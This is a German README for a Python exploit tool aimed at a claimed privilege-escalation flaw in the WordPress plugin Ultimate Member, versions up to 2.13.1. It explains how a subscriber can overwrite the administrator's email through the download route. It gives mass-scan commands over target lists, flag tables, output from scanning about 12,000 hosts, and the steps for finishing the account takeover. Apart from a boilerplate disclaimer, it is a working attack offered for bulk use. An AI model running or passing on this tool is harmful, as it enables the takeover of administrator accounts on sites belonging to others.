
WordPress Ultimate Member Plugin <= 2.13.1 - Privilegieneskalation-Schwachstelle
WordPress Ultimate Member Plugin <= 2.13.1 - Privilegieneskalation-Schwachstelle
Ultimate Member <= 2.13.1 — Privilegieneskalation / Account-Übernahme
📌 Offizieller Eintrag: CVE-2026-96451
Von CVE.org:
Umgehung der Autorisierung durch benutzergesteuerten Schlüssel in Ultimate Member Ultimate Member ultimate-member ermöglicht Privilegieneskalation. Dieses Problem betrifft Ultimate Member: von n/a bis 2.13.1.
| Feld | Wert |
|---|---|
| 🆔 CVE | CVE-2026-96451 |
| 🏷️ CWE | CWE-639 — Umgehung der Autorisierung durch benutzergesteuerten Schlüssel |
| 📊 CVSS 3.1 | 8.8 HOCH AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 🏢 Zuweiser | Patchstack |
| ⚠️ Betroffen | Ultimate Member bis 2.13.1 |
| ✅ Behoben | 2.14.0 |
Ein angemeldeter Abonnent kann die E-Mail-Adresse eines anderen Benutzers ändern (normalerweise die des Administrators). WordPress akzeptiert dann eine Passwortzurücksetzung für dieses neue Postfach.
um_fetch_user($user_id) auf und wechselt den globalen Benutzer auf die ID in der URL.download_routing() ohne um_reset_user() zurück._um_account=1, user_email=...).account_submit() liest um_user('ID') — jetzt das Opfer — und schreibt die neue E-Mail-Adresse.Die Download-Nonce ist wp_create_nonce($user_id . $form_id . 'um-download-nonce'). Sie ist an diese Benutzer-ID gebunden. Sie kann nicht erfunden werden. Das Skript kopiert sie aus einem sichtbaren /um-download/{form}/{field}/{user}/{nonce}/-Link.
Ein benutzerdefiniertes Datei- oder Bild-Feld muss im Profil angezeigt werden. Integrierte Profil-/Titelbilder erzeugen diesen Link nicht.
pip install requests rich
Registrierung, Anmeldung, Nonce-Sammlung, Exploit und Reset-Prüfung sind automatisch. Sie erstellen keine Konten manuell und übergeben kein Abonnenten-Passwort für einen Massenscan.
python CVE-2026-96451.py -l targets.txt -t 80 --email "[email protected]" -o um_takeover.txt
Was dieser Befehl auf jedem Host tut:
/account/ öffnen/um-download/-Nonce finden (bevorzugt Benutzer-ID 1, dann jedes Mitglied mit einer Datei)--email setzenwp-login.php?action=lostpassword prüfen (WordPress benötigt hier keine Nonce)um_takeover.txt schreiben--email ist das Postfach, das auf dem Zielkonto platziert wird, damit Sie die Zurücksetzung empfangen können. Das Skript öffnet nicht den Posteingang oder setzt ein neues Passwort. Dieser letzte Schritt ist manuell.
python CVE-2026-96451.py -u "https://example.com" --email "[email protected]"
| Flag | Zweck | Standard |
|---|---|---|
-l / --list | Datei mit Zielen | — |
-u / --url | Ein Ziel | — |
-t / --threads | Worker | 10 |
-o / --output | Ergebnisdatei | um_takeover.txt |
--email | Postfach, das auf das Opfer geschrieben wird | automatisch generiert |
--target-id | Bevorzugte Benutzer-ID | 1 |
--user / --password | Vorhandenen Abonnenten verwenden statt zu registrieren | aus |
-v / --verbose | Jede Phase ausgeben | aus |
Auf einer langsamen RDP-Box sind 80–150 Threads ausreichend. Ein Listenscan gibt jedem Host etwa 22 Sekunden.
[5400/11965] RST:0 CHG:0 UM:4463 REG:589 rf:3874 lf:0 na:141 nd:448 nc:0 no:937
| Code | Bedeutung |
|---|---|
RST / CHG | E-Mail geändert und/oder Zurücksetzung akzeptiert — Posteingang prüfen |
UM | Ultimate Member erkannt |
REG | Automatische Registrierung hat eine Sitzung erstellt |
rf | Kein öffentliches Formular, CAPTCHA, Genehmigung oder E-Mail-Aktivierung |
lf | Registriert, aber Anmeldung fehlgeschlagen |
na | Kontoseite / Nonce fehlt |
nd | Keine sichtbare Download-Nonce (kein benutzerdefiniertes Dateifeld) |
nc | Exploit gesendet, Änderung nicht bestätigt |
no | Kein Ultimate Member |
REG_FAIL auf vielen Hosts ist normal. Die Kette wird nur dort fortgesetzt, wo die Registrierung eine Sitzung erstellt und ein Download-Link sichtbar ist.
Wenn RST oder CHG erscheint:
--email übergebene Postfach/wp-login.php oder /wp-admin/ anDieses Projekt ist nur für autorisierten Sicherheitsforschung bestimmt — Systeme, die Ihnen gehören oder für die Sie eine schriftliche Genehmigung zum Testen haben.
Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch, Schäden oder jegliche Ergebnisse dieser Software. Sie sind allein verantwortlich für die Art und Weise der Nutzung und für jedes Ziel, das Sie scannen.
Von: Nxploited ( Khaled Alenazi )